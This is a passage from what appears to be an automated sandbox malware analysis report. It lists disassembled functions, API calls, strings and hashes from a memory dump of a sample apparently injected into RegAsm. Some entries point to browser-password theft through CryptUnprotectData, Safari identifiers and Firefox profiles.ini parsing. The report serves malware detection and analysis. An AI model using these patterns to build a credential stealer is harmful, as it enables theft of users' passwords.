                                                                                                                                                                                • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                                                                                                • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                                                                                                                                                Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1865533344-0
                                                                                                                                                                                • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                                                                                                • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                                                                                                • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                                                                                                • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                                                                                                Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Version
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1889659487-0
                                                                                                                                                                                • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                                                • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                                                                                                • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                                                • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                                                                                                Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: NtdllProc_Window
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4255912815-0
                                                                                                                                                                                • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                                                                                                • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                                                                                                Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
                                                                                                                                                                                • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                • API String ID: 2257402768-1134094380
                                                                                                                                                                                • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                                                                                • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                                • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                                                                                • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                                                Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                                • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                                • API String ID: 2787044678-1921111777
                                                                                                                                                                                • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                                                • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                                                Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                                • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                • API String ID: 2080319088-3046471546
                                                                                                                                                                                • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                                                • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                                                Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                                • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                                • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                                • memset.MSVCRT ref: 00413292
                                                                                                                                                                                • memset.MSVCRT ref: 004132B4
                                                                                                                                                                                • memset.MSVCRT ref: 004132CD
                                                                                                                                                                                • memset.MSVCRT ref: 004132E1
                                                                                                                                                                                • memset.MSVCRT ref: 004132FB
                                                                                                                                                                                • memset.MSVCRT ref: 00413310
                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                                • memset.MSVCRT ref: 004133C0
                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                                • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                                                                • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                                • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                                Strings
                                                                                                                                                                                • {Unknown}, xrefs: 004132A6
                                                                                                                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                • API String ID: 4111938811-1819279800
                                                                                                                                                                                • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                                                • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                                                Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0040129E
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                                • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 829165378-0
                                                                                                                                                                                • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                                                • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                                                Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00404172
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                • memset.MSVCRT ref: 00404200
                                                                                                                                                                                • memset.MSVCRT ref: 00404215
                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                                • API String ID: 2454223109-1580313836
                                                                                                                                                                                • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                                • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                                Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                                • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                                • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                                • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                                                                • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                                • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                                • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                                • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                                • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                                • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                                  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                                  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                                • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                                • API String ID: 4054529287-3175352466
                                                                                                                                                                                • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                                • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                                                Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                • API String ID: 3143752011-1996832678
                                                                                                                                                                                • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                                                                • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                                                                Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                • API String ID: 1607361635-601624466
                                                                                                                                                                                • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                                                • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                                                Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                • API String ID: 2000436516-3842416460
                                                                                                                                                                                • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                                • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                                Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                Memory Dump Source
